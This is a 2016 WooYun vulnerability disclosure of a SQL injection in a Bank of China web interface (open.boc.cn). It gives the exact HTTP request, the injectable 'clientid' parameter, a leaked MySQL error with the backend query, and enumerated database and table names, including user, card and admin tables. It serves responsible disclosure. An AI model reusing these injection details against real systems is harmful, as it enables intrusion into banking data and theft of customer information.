当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205199

漏洞标题:中国银行某站MySQL注射(涉及管理员密码/大量用户卡号信息)

相关厂商:中国银行

漏洞作者: Aasron

提交时间:2016-05-05 10:24

修复时间:2016-06-19 22:10

公开时间:2016-06-19 22:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

中国银行某站MySQL注射(涉及管理员密码/百万用户信息)

详细说明:

PUT /interFace/getAppUpdate.php HTTP/1.1
Host: open.boc.cn
Content-Type: application/json
Connection: close
Accept: application/json
User-Agent: ESchool/1.1 CFNetwork/758.3.15 Darwin/15.4.0
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Length: 29
{"clientid":"399","type":"1"}


注入参数#clientid


正常返回内容

{"clientkey":"399","version":"1.0.2","appversion":"177","appurl":"http:\/\/open.boc.cn\/apps\/appdownload\/41295","need_update":"0","new_function":"","appfilesize":"","incrementSize":""}


报错

<b>MySQL server error report:Array
(
    [0] => Array
        (
            [message] => MySQL Query Error
        )
    [1] => Array
        (
            [sql] => SELECT goods_name,ios_file,app_version,goods_id,client_key as clientkey,need_update,new_function,category_ver as appversion FROM `ec`.`aps_goods`  where  client_key=399'
        )
    [2] => Array
        (
            [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
        )
    [3] => Array
        (
            [errno] => 1064
        )
)

漏洞证明:

available databases [11]:
[*] bim
[*] container
[*] ec
[*] ezcis
[*] information_schema
[*] mysql
[*] ndbinfo
[*] performance_schema
[*] sap
[*] test
[*] ultrax


当前数据库:ec


+-------------------------------+
| aps_account_log               |
| aps_ad                        |
| aps_ad_custom                 |
| aps_ad_position               |
| aps_admin_action              |
| aps_admin_log                 |
| aps_admin_message             |
| aps_admin_user                |
| aps_adsense                   |
| aps_affiliate_log             |
| aps_agency                    |
| aps_apps                      |
| aps_apps_bak150321            |
| aps_apps_bak151205            |
| aps_apps_cat                  |
| aps_apps_relation             |
| aps_area_region               |
| aps_article                   |
| aps_article_cat               |
| aps_article_cat_bak           |
| aps_article_comment           |
| aps_attribute                 |
| aps_auction_log               |
| aps_auto_manage               |
| aps_back_goods                |
| aps_back_order                |
| aps_bank_info                 |
| aps_banner                    |
| aps_bonus_type                |
| aps_booking_goods             |
| aps_brand                     |
| aps_card                      |
| aps_card_trans_audit          |
| aps_cart                      |
| aps_cat_recommend             |
| aps_category                  |
| aps_collect_goods             |
| aps_comment                   |
| aps_crons                     |
| aps_custom_pads               |
| aps_customs                   |
| aps_dcode                     |
| aps_delivery_goods            |
| aps_delivery_order            |
| aps_dic_h5_interface          |
| aps_dic_paper_category        |
| aps_dic_site_letter           |
| aps_download_log              |
| aps_email_list                |
| aps_email_sendlist            |
| aps_error_log                 |
| aps_exchange_goods            |
| aps_failedlogin               |
| aps_favourable_activity       |
| aps_feedback                  |
| aps_friend_link               |
| aps_general_bank              |
| aps_general_interface         |
| aps_goods                     |
| aps_goods_20141206            |
| aps_goods_activity            |
| aps_goods_article             |
| aps_goods_attr                |
| aps_goods_bak150321           |
| aps_goods_bak151205           |
| aps_goods_cat                 |
| aps_goods_gallery             |
| aps_goods_interface           |
| aps_goods_interface_bak151205 |
| aps_goods_relation            |
| aps_goods_type                |
| aps_goods_whites              |
| aps_group_goods               |
| aps_interface                 |
| aps_interface0321             |
| aps_keywords                  |
| aps_link_goods                |
| aps_log_conf                  |
| aps_log_data                  |
| aps_log_goods_download        |
| aps_mail_templates            |
| aps_manage_ip                 |
| aps_match_goods               |
| aps_matchor                   |
| aps_member_price              |
| aps_nav                       |
| aps_order_action              |
| aps_order_goods               |
| aps_order_info                |
| aps_pack                      |
| aps_package_goods             |
| aps_para_info                 |
| aps_para_type                 |
| aps_pay_log                   |
| aps_payment                   |
| aps_plugins                   |
| aps_poster                    |
| aps_poster_copy               |
| aps_products                  |
| aps_reg_extend_info           |
| aps_reg_fields                |
| aps_region                    |
| aps_role                      |
| aps_searchengine              |
| aps_sessions                  |
| aps_sessions_data             |
| aps_shipping                  |
| aps_shipping_area             |
| aps_shop_config               |
| aps_snatch_log                |
| aps_special_url               |
| aps_stats                     |
| aps_suppliers                 |
| aps_tag                       |
| aps_template                  |
| aps_topic                     |
| aps_user_account              |
| aps_user_address              |
| aps_user_app                  |
| aps_user_bonus                |
| aps_user_feed                 |
| aps_user_pictures             |
| aps_user_pictures_copy        |
| aps_user_rank                 |
| aps_user_test_account         |
| aps_user_test_card            |
| aps_user_trans_audit          |
| aps_users                     |
| aps_users_bak                 |
| aps_users_bak150321           |
| aps_users_bak150321_copy      |
| aps_users_copy                |
| aps_validate_code             |
| aps_validate_code_copy        |
| aps_virtual_card              |
| aps_volume_price              |
| aps_vote                      |
| aps_vote_log                  |
| aps_vote_option               |
| aps_wholesale                 |
+-------------------------------+


1.png


保证用户安全,不深入测试

修复方案:

过滤神马的

版权声明:转载请注明来源 Aasron@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-05 22:07

厂商回复:

感谢白帽子

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-05 10:37 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习,多挖洞!)

    大牛,收徒弟吗?

  2. 2016-05-05 10:59 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    银行。。。

  3. 2016-05-05 11:25 | 开心一下1313 ( 实习白帽子 | Rank:77 漏洞数:27 | 喝口水,压压惊......)

    有钱

  4. 2016-05-06 08:17 | _Thorns ( 普通白帽子 | Rank:1744 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    看来表哥的神器已经写好了。